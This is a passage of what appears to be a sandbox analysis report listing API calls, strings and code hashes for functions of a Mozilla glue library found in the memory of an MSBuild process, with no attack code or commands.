                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __aulldiv
                                                                                                                                                                                                                      • String ID: -%llu$.$profiler-paused
                                                                                                                                                                                                                      • API String ID: 3732870572-2661126502
                                                                                                                                                                                                                      • Opcode ID: 629e1cecacf3ef77b7818c610f583319a50908ab4d7db077a200a36f32651ab7
                                                                                                                                                                                                                      • Instruction ID: ef5343476d5b490fc3455cbc89cf286a018e48b9cacd97dd313984ec595f701a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 629e1cecacf3ef77b7818c610f583319a50908ab4d7db077a200a36f32651ab7
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 65413471A047089BCB18DF78E95155EBBE5ABC5248F118A3EF856A7B41EB30A844C781
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6C8F985D
                                                                                                                                                                                                                      • ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6C8F987D
                                                                                                                                                                                                                      • MOZ_CrashPrintf.MOZGLUE(ElementAt(aIndex = %zu, aLength = %zu),?,?), ref: 6C8F98DE
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • ElementAt(aIndex = %zu, aLength = %zu), xrefs: 6C8F98D9
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Printf$Target@mozilla@@$?vprint@Crash
                                                                                                                                                                                                                      • String ID: ElementAt(aIndex = %zu, aLength = %zu)
                                                                                                                                                                                                                      • API String ID: 1778083764-3290996778
                                                                                                                                                                                                                      • Opcode ID: b8e76c73fc8afcd66727c7723bf80a42f69e530c45cc5e0e3e82ba092d1b5bf3
                                                                                                                                                                                                                      • Instruction ID: 1476610af0ac154fd682e45b234f13d15d4018cff1c5e5202bc1638163b55e1c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b8e76c73fc8afcd66727c7723bf80a42f69e530c45cc5e0e3e82ba092d1b5bf3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F8310871B0020C6FDB24AF5DD9449EE77A9EF88318F50483DEA1AAB740DB319905CBE1
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __aulldiv.LIBCMT ref: 6C8D4721
                                                                                                                                                                                                                        • Part of subcall function 6C884410: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,6C8C3EBD,00000017,?,00000000,?,6C8C3EBD,?,?,6C8842D2), ref: 6C884444
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __aulldiv__stdio_common_vsprintf
                                                                                                                                                                                                                      • String ID: -%llu$.$profiler-paused
                                                                                                                                                                                                                      • API String ID: 680628322-2661126502
                                                                                                                                                                                                                      • Opcode ID: 7448465410d454262499ecb2499a39f8e2ef4047fa88fd6b78ab7903ed9452af
                                                                                                                                                                                                                      • Instruction ID: c5a85073944554d8cbf60487e75aad19b9d6a35d1137d43852fcbf14ddd4ce33
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7448465410d454262499ecb2499a39f8e2ef4047fa88fd6b78ab7903ed9452af
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7C313971F043085BCB18DF6CD99169EBBE6DBC9314F15493DE8059BB41E770A8448B50
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 6C884290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C8C3EBD,6C8C3EBD,00000000), ref: 6C8842A9
                                                                                                                                                                                                                      • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C8DB127), ref: 6C8DB463
                                                                                                                                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C8DB4C9
                                                                                                                                                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6C8DB4E4
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _getpidstrlenstrncmptolower
                                                                                                                                                                                                                      • String ID: pid:
                                                                                                                                                                                                                      • API String ID: 1720406129-3403741246
                                                                                                                                                                                                                      • Opcode ID: 5f63fc1d23574f22ab9a7bc0ca14b0782fe0512617f9e41507d305142fce4bc2
                                                                                                                                                                                                                      • Instruction ID: dd2a03f7636d1b44fddd80f6d4ab4734a528b08a078d163bb3d16fc2a265a422
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5f63fc1d23574f22ab9a7bc0ca14b0782fe0512617f9e41507d305142fce4bc2
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B9310231A01208DBDB20DFA9D980ABFB7B6BF49319F55092DD80167A40DB31F845CBA1
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(shell32,?,6C8FD020), ref: 6C88F122
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C88F132
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                      • String ID: SHGetKnownFolderPath$shell32
                                                                                                                                                                                                                      • API String ID: 2574300362-1045111711
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CE577
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8CE584
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8CE5DE
                                                                                                                                                                                                                      • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C8CE8A6
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ExclusiveLock$AcquireCurrentReleaseThreadXbad_function_call@std@@
                                                                                                                                                                                                                      • String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
                                                                                                                                                                                                                      • API String ID: 1483687287-53385798
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C8D0CD5
                                                                                                                                                                                                                        • Part of subcall function 6C8BF960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C8BF9A7
                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C8D0D40
                                                                                                                                                                                                                      • free.MOZGLUE ref: 6C8D0DCB
                                                                                                                                                                                                                        • Part of subcall function 6C8A5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C8A5EDB
                                                                                                                                                                                                                        • Part of subcall function 6C8A5E90: memset.VCRUNTIME140(6C8E7765,000000E5,55CCCCCC), ref: 6C8A5F27
                                                                                                                                                                                                                        • Part of subcall function 6C8A5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C8A5FB2
                                                                                                                                                                                                                      • free.MOZGLUE ref: 6C8D0DDD
                                                                                                                                                                                                                      • free.MOZGLUE ref: 6C8D0DF2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4069420150-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6C8D8242,?,00000000,?,6C8CB63F), ref: 6C8D9188
                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C8D8242,?,00000000,?,6C8CB63F), ref: 6C8D91BB
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,00000008,0000000F,?,?,6C8D8242,?,00000000,?,6C8CB63F), ref: 6C8D91EB
                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C8D8242,?,00000000,?,6C8CB63F), ref: 6C8D9200
                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,6C8D8242,?,00000000,?,6C8CB63F), ref: 6C8D9219
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: malloc$freememcpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4259248891-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C90E7DC), ref: 6C8C0838
                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,00000158), ref: 6C8C084C
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C8C08AF
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 6C8C08BD
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C90E7DC), ref: 6C8C08D5
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalSection$EnterLeave$memset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 837921583-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6C8917B2
                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,?,?), ref: 6C8918EE
                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C891911
                                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C89194C
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo_noreturnfreememcpymemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3725304770-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetTickCount64.KERNEL32 ref: 6C8A5D40
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C90F688), ref: 6C8A5D67
                                                                                                                                                                                                                      • __aulldiv.LIBCMT ref: 6C8A5DB4
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C90F688), ref: 6C8A5DED
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 557828605-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetTickCount64.KERNEL32 ref: 6C8E7250
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C90F688), ref: 6C8E7277
                                                                                                                                                                                                                      • __aulldiv.LIBCMT ref: 6C8E72C4
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C90F688), ref: 6C8E72F7
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 557828605-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6C88CEBD
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6C88CEF5
                                                                                                                                                                                                                      • memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6C88CF4E
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$memset
                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                      • API String ID: 438689982-4108050209
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8E77FA
                                                                                                                                                                                                                      • ?StringToDouble@StringToDoubleConverter@double_conversion@@QBENPBDHPAH@Z.MOZGLUE(00000001,00000000,?), ref: 6C8E7829
                                                                                                                                                                                                                        • Part of subcall function 6C8BCC38: GetCurrentProcess.KERNEL32(?,?,?,?,6C8831A7), ref: 6C8BCC45
                                                                                                                                                                                                                        • Part of subcall function 6C8BCC38: TerminateProcess.KERNEL32(00000000,00000003,?,?,?,?,6C8831A7), ref: 6C8BCC4E
                                                                                                                                                                                                                      • ?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C8E789F
                                                                                                                                                                                                                      • ?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C8E78CF
                                                                                                                                                                                                                        • Part of subcall function 6C884DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C884E5A
                                                                                                                                                                                                                        • Part of subcall function 6C884DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C884E97
                                                                                                                                                                                                                        • Part of subcall function 6C884290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C8C3EBD,6C8C3EBD,00000000), ref: 6C8842A9
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: String$Double$Converter@double_conversion@@$DtoaProcessstrlen$Ascii@Builder@2@Builder@2@@Converter@CreateCurrentDecimalDouble@EcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestTerminateV12@
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2525797420-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6C8C82BC,?,?), ref: 6C8C649B
                                                                                                                                                                                                                        • Part of subcall function 6C89CA10: malloc.MOZGLUE(?), ref: 6C89CA26
                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8C64A9
                                                                                                                                                                                                                        • Part of subcall function 6C8BFA80: GetCurrentThreadId.KERNEL32 ref: 6C8BFA8D
                                                                                                                                                                                                                        • Part of subcall function 6C8BFA80: AcquireSRWLockExclusive.KERNEL32(6C90F448), ref: 6C8BFA99
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8C653F
                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C8C655A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3596744550-0
                                                                                                                                                                                                                      • Opcode ID: 2728c9be55928ad127088ac5667100cf665101baf2b6540644e46ce488bf22e2
                                                                                                                                                                                                                      • Instruction ID: f6b367af92966ffa62256818fde5130ed34620b05db8ee942472386dc37ced3c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2728c9be55928ad127088ac5667100cf665101baf2b6540644e46ce488bf22e2
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 183181B5A083059FD700CF18D98069AB7F4FF88314F10483DE85A97741DB30E919CB92
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C8DA315
                                                                                                                                                                                                                      • ?_Xbad_function_call@std@@YAXXZ.MSVCP140(?), ref: 6C8DA31F
                                                                                                                                                                                                                      • free.MOZGLUE(00000000,?,?,?,?), ref: 6C8DA36A
                                                                                                                                                                                                                        • Part of subcall function 6C8A5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C8A5EDB
                                                                                                                                                                                                                        • Part of subcall function 6C8A5E90: memset.VCRUNTIME140(6C8E7765,000000E5,55CCCCCC), ref: 6C8A5F27
                                                                                                                                                                                                                        • Part of subcall function 6C8A5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C8A5FB2
                                                                                                                                                                                                                        • Part of subcall function 6C8D2140: free.MOZGLUE(?,00000060,?,6C8D7D36,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8D215D
                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C8DA37C
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
